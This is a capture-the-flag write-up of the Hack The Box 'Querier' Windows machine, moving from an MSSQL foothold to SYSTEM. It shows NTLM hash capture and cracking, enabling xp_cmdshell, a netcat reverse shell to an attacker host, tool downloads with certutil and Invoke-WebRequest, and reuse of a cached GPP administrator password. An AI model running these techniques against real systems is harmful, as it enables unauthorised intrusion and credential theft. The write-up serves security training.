Querier - wook413

#hackthebox #windows #medium #MSSQL #PowerUp ![[Pasted image 20250803231113.png]] # Information Gathering - Nmap I scanned all TCP ports and discovered 14 open ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 00:45 UTC Nmap scan report for 10.10.10.125 Host is up (0.055s latency). Not shown: 65514 closed tcp ports (reset), 7 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1433/tcp open ms-sql-s 5985/tcp open wsman 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown 49671/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 16.98 seconds ``` I performed another TCP scan against those open ports to gather more information ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669,49670,49671 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 00:47 UTC Nmap scan report for 10.10.10.125 Host is up (0.049s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM | ms-sql-info: | 10.10.10.125:1433: | Version: | name: Microsoft SQL Server 2017 RTM | number: 14.00.1000.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ms-sql-ntlm-info: | 10.10.10.125:1433: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: QUERIER | DNS_Domain_Name: HTB.LOCAL | DNS_Computer_Name: QUERIER.HTB.LOCAL | DNS_Tree_Name: HTB.LOCAL |_ Product_Version: 10.0.17763 |_ssl-date: 2025-08-04T00:48:29+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-08-04T00:43:52 |_Not valid after: 2055-08-04T00:43:52 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2025-08-04T00:48:24 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 63.83 seconds ``` Lastly, I scanned top 10 UDP ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 00:51 UTC Nmap scan report for 10.10.10.125 Host is up (0.052s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp open|filtered ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 7.01 seconds ``` --- # Enumeration ##### SMB - TCP 139, 445 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ smbclient -N -L //$IP Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reports Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ smbclient -N //$IP/Reports Try "help" to get a list of possible commands. smb: \> dir . D 0 Mon Jan 28 23:23:48 2019 .. D 0 Mon Jan 28 23:23:48 2019 Currency Volume Report.xlsm A 12229 Sun Jan 27 22:21:34 2019 5158399 blocks of size 4096. 852655 blocks available ``` I downloaded the file and opened it with `libreoffice` but the file didn't have any information. ![[Pasted image 20250803200906.png]] `exiftool` revealed the creator of this file was `Luis`. At least we got something out of the file. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ exiftool Currency\ Volume\ Report.xlsm ExifTool Version Number : 13.25 File Name : Currency Volume Report.xlsm Directory : . File Size : 12 kB File Modification Date/Time : 2025:08:04 00:56:28+00:00 File Access Date/Time : 2025:08:04 00:57:18+00:00 File Inode Change Date/Time : 2025:08:04 00:56:28+00:00 File Permissions : -rw-r--r-- File Type : XLSM File Type Extension : xlsm MIME Type : application/vnd.ms-excel.sheet.macroEnabled.12 Zip Required Version : 20 Zip Bit Flag : 0x0006 Zip Compression : Deflated Zip Modify Date : 1980:01:01 00:00:00 Zip CRC : 0x513599ac Zip Compressed Size : 367 Zip Uncompressed Size : 1087 Zip File Name : [Content_Types].xml Creator : Luis Last Modified By : Luis Create Date : 2019:01:21 20:38:56Z Modify Date : 2019:01:27 22:21:34Z Application : Microsoft Excel Doc Security : None Scale Crop : No Heading Pairs : Worksheets, 1 Titles Of Parts : Currency Volume Company : Links Up To Date : No Shared Doc : No Hyperlinks Changed : No App Version : 16.0300 ``` I was very skeptical that I couldn't find any information on the `Currency Volume Report.xlsm` file, so I opened it and closed it multiple times but then I noticed this warning sign about `Macros`. I ![[Pasted image 20250803201808.png]] I clicked on `Show Macros` and I discovered a set of credentials which appear to be valid on MSSQL. ![[Pasted image 20250803201657.png]] # Initial Access - Shell as `mssql-svc` I was connected to `MSSQL` with the found credentials. Make sure to use `-windows-auth`, otherwise you are not going to be authenticated. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-mssqlclient reporting:'PcwTWTHRwryjc$c6'@$IP -windows-auth Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(QUERIER): Line 1: Changed database context to 'volume'. [*] INFO(QUERIER): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL (QUERIER\reporting reporting@volume)> ``` `xp_cmdshell` was denied and the current user is not able to execute `enable_xp_cmdshell` command. At this point, I think it's a good idea to attempt to grab a user's NTLM hash using `xp_dirtree` + `responder`. ```bash SQL (QUERIER\reporting reporting@volume)> xp_cmdshell whoami ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'. SQL (QUERIER\reporting reporting@volume)> enable_xp_cmdshell ERROR(QUERIER): Line 105: User does not have permission to perform this action. ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement. ERROR(QUERIER): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option. ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement. ``` I captured `mssql-svc`'s NTLM hash. ![[Pasted image 20250803210626.png]] `hashcat`'s example hashes tells us the mode of NTLMv2 hash: `5600`. ![[Pasted image 20250803211329.png]] Successfully cracked the hash. ![[Pasted image 20250803211511.png]] `mssql-svc:corporate568` logged back into `MSSQL` using `impacket-mssqlclient` with the valid credentials I just found. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-mssqlclient mssql-svc:'corporate568'@$IP -windows-auth Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(QUERIER): Line 1: Changed database context to 'master'. [*] INFO(QUERIER): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL (QUERIER\mssql-svc dbo@master)> ``` This time the error message for `xp_cmdshell` is different. I was able to enable it. ```bash SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell whoami ERROR(QUERIER): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online. SQL (QUERIER\mssql-svc dbo@master)> enable_xp_cmdshell INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL (QUERIER\mssql-svc dbo@master)> ``` ```bash SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell whoami output ----------------- querier\mssql-svc NULL SQL (QUERIER\mssql-svc dbo@master)> ``` ![[Pasted image 20250803214911.png]] - `Pane 1` runs `xp_cmdshell`, fetches `nc64.exe`, executes the binary, executes `cmd.exe` and connects to `10.10.14.14:443` which is `Pane 3` - `Pane 2` hosts SMB server and hands out the `nc64.exe` binary to `Pane 1` - `Pane 3` listens for reverse shell connection. When the target's `nc.exe` asks for connection on port 443, it binds all of inputs/outputs of `cmd.exe` to that TCP connection. ![[Pasted image 20250803220654.png]] Got the shell. ```powershell ┌──(kali㉿kali)-[~/Desktop] └─$ rlwrap nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.14] from (UNKNOWN) [10.10.10.125] 49690 Microsoft Windows [Version 10.0.17763.292] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami querier\mssql-svc ``` Found `user.txt` in `C:\Users\mssql-svc\Desktop` ```powershell Directory of C:\Users\mssql-svc\Desktop 01/29/2019 12:42 AM <DIR> . 01/29/2019 12:42 AM <DIR> .. 08/04/2025 01:44 AM 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 3,479,777,280 bytes free C:\Users\mssql-svc\Desktop>type user.txt type user.txt 5d1... ``` # Privilege Escalation ```bash C:\Windows\system32>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled ``` ```powershell PS C:\Users\Public> certutil -urlcache -split -f http://10.10.14.14:443/JuicyPotato.exe JuicyPotato.exe certutil -urlcache -split -f http://10.10.14.14:443/JuicyPotato.exe JuicyPotato.exe At line:1 char:1 + certutil -urlcache -split -f http://10.10.14.14:443/JuicyPotato.exe J ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent ``` ```powershell PS C:\Users\Public> Invoke-WebRequest -Uri http://10.10.14.14:443/JuicyPotato.exe -outfile JuicyPotato.exe Invoke-WebRequest -Uri http://10.10.14.14:443/JuicyPotato.exe -outfile JuicyPotato.exe PS C:\Users\Public> dir dir Directory: C:\Users\Public Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 1/28/2019 10:16 PM Documents d-r--- 9/15/2018 8:19 AM Downloads d-r--- 9/15/2018 8:19 AM Music d-r--- 9/15/2018 8:19 AM Pictures d----- 8/4/2025 4:41 AM Temp d-r--- 9/15/2018 8:19 AM Videos -a---- 8/4/2025 4:43 AM 7 hello.txt -a---- 8/4/2025 4:45 AM 347648 JuicyPotato.exe ``` I tried `Juicy Potato` multiple times but it failed every time. ```powershell PS C:\Users\Public> ./JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * ./JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337 COM -> recv failed with error: 10038 ``` There existed `Unattend.xml` in `C:\Windows\Panther` but it didn't expose any passwords. ```powershell Directory: C:\windows\panther Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 1/29/2019 6:16 AM actionqueue d----- 1/29/2019 6:15 AM setup.exe d----- 1/29/2019 6:15 AM UnattendGC -a---- 1/29/2019 6:15 AM 44909 cbs.log -a---- 1/29/2019 6:15 AM 43273 cbs_unattend.log -a---- 1/29/2019 6:15 AM 68 Contents0.dir -a---- 1/29/2019 6:16 AM 68 Contents1.dir -a---- 1/29/2019 6:16 AM 1221 DDACLSys.log -a---- 1/29/2019 6:16 AM 6016 diagerr.xml -a---- 1/29/2019 6:16 AM 21536 diagwrn.xml -a---- 1/29/2019 6:15 AM 28834 MainQueueOnline0.que -a---- 1/29/2019 6:16 AM 27478 MainQueueOnline1.que -a---- 8/4/2025 1:43 AM 311296 setup.etl -a---- 1/28/2019 10:18 PM 415520 setupact.log -a---- 1/29/2019 6:12 AM 116 setuperr.log -a---- 1/29/2019 6:16 AM 250112 setupinfo -a---- 1/28/2019 10:16 PM 5211 unattend.xml PS C:\windows\panther> type unattend.xml | findstr /i password type unattend.xml | findstr /i password <Password>*SENSITIVE*DATA*DELETED*</Password> <Password>*SENSITIVE*DATA*DELETED*</Password> ``` At this point, manually looking for privesc vectors is too tiring, I transferred `PowerUp.ps1` to the reverse shell. ![[Pasted image 20250803230313.png]] It was so easy! It enumerated 5 vectors including 2 vectors I had already found. ![[Pasted image 20250803230635.png]] ```powershell Changed : {2019-01-28 23:12:48} UserNames : {Administrator} NewName : [BLANK] Passwords : {MyUnclesAreMarioAndLuigi!!1!} File : C:\ProgramData\Microsoft\Group \{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml Check : Cached GPP Files ``` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-psexec Administrator:'MyUnclesAreMarioAndLuigi!!1!'@$IP Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on 10.10.10.125..... [*] Found writable share ADMIN$ [*] Uploading file OVjxquqn.exe [*] Opening SVCManager on 10.10.10.125..... [*] Creating service WbiF on 10.10.10.125..... [*] Starting service WbiF..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.292] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system ``` ```powershell C:\Users\Administrator\Desktop> type root.txt 807... ``` Of course, both `wmiexec` and `evil-winrm` also work. ```powershell ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-wmiexec Administrator:'MyUnclesAreMarioAndLuigi!!1!'@$IP Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami querier\administrator ``` ```powershell ┌──(kali㉿kali)-[~/Desktop] └─$ evil-winrm -i $IP -u Administrator -p 'MyUnclesAreMarioAndLuigi!!1!' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami querier\administrator ```